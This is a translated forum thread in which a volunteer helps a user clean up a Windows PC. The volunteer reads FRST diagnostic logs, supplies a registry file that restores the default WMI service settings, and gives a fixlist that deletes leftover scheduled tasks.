Drive c: (SYSTEM) (Fixed) (Total:244.04 GB) (Free:147.03 GB) NTFS
Drive d: () (Fixed) (Total:341.8 GB) (Free:305.54 GB) NTFS
Drive e: () (Fixed) (Total:345.57 GB) (Free:343.63 GB) NTFS
Drive h: (FlatOut 2) (CDROM) (Total:2.74 GB) (Free:0 GB) CDFS
Drive i: (CRYSIS 2) (CDROM) (Total:7.64 GB) (Free:0 GB) CDFS
Drive j: (Blades of Time) (CDROM) (Total:3.1 GB) (Free:0 GB) CDFS
Drive k: (Viking) (CDROM) (Total:4 GB) (Free:0 GB) CDFS

==================== MBR & Tablica partycji ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 2225CE9F)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=244 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=341.8 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=345.6 GB) - (Type=07 NTFS)
 

Twój_Anioł_Stróż
comment

The FRST.txt log is missing.

1)

Sprawdź usługę "winmgmt" lub napraw WMI.

Paste into Notepad:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmgmt]
"DisplayName"="@%Systemroot%\\system32\\wbem\\wmisvc.dll,-205"
"ImagePath"=hex(2):25,00,73,00,79,00,73,00,74,00,65,00,6d,00,72,00,6f,00,6f,00,\
74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\
00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\
6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,00,00
"Description"="@%Systemroot%\\system32\\wbem\\wmisvc.dll,-204"
"ObjectName"="localSystem"
"ErrorControl"=dword:00000000
"Start"=dword:00000002
"Type"=dword:00000020
"DependOnService"=hex(7):52,00,50,00,43,00,53,00,53,00,00,00,00,00
"ServiceSidType"=dword:00000001
"FailureActions"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\
00,01,00,00,00,c0,d4,01,00,01,00,00,00,e0,93,04,00,00,00,00,00,00,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmgmt\Parameters]
"ServiceDllUnloadOnStop"=dword:00000001
"ServiceDll"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,\
00,74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,\
77,00,62,00,65,00,6d,00,5c,00,57,00,4d,00,49,00,73,00,76,00,63,00,2e,00,64,\
00,6c,00,6c,00,00,00
"ServiceMain"="ServiceMain"

From the Notepad menu >> File >> Save as >> set the file type to All files >> Save as > FIX.REG >>
Right-click the file and choose Merge from the menu. Confirm the import into the registry.

2) Open Notepad and paste into it:

Task: {AAA89DAF-1B4F-447D-AF21-7F0559AC9962} - \Microsoft\Windows\Windows Media Sharing\UpdateLibrary -> Brak pliku <==== UWAGA
Task: {3D130900-BA53-43C7-BDD8-8F2306411FAD} - \AutoPico Daily Restart -> Brak pliku <==== UWAGA
EmptyTemp:

Save the file as fixlist.txt and place it next to FRST.exe.
Run FRST and click the Fix (NAPRAW) button.

3) Generate new FRST logs.

Paste the log at http://wklejto.pl/ and put only the link in your post (i.e. copy the address from the address bar).

.
 

aQuaK1337
comment

I have the fixlist in the same folder as FRST and it still doesn't detect it ;/

Twój_Anioł_Stróż
comment

C:\Users\Rafał\Downloads

are you sure you have the fixlist in this folder?

aQuaK1337
comment

OK, it works, I'll make new logs in a moment and paste them.


FRST: http://wklej.to/nejWg

ADDITION: http://wklej.to/zrmRW


Angel... advise me how to remove these damn ads ;/

http://screenshot.sh/mFcgkDtZhndnz


I have Adblock but, as you can see, it works badly

Twój_Anioł_Stróż
comment

In the new logs - nothing suspicious.

I don't know a way to deal with such ads - they are probably attached to the pages.

.

aQuaK1337
comment

OK, never mind. Thanks for the help with the viruses.
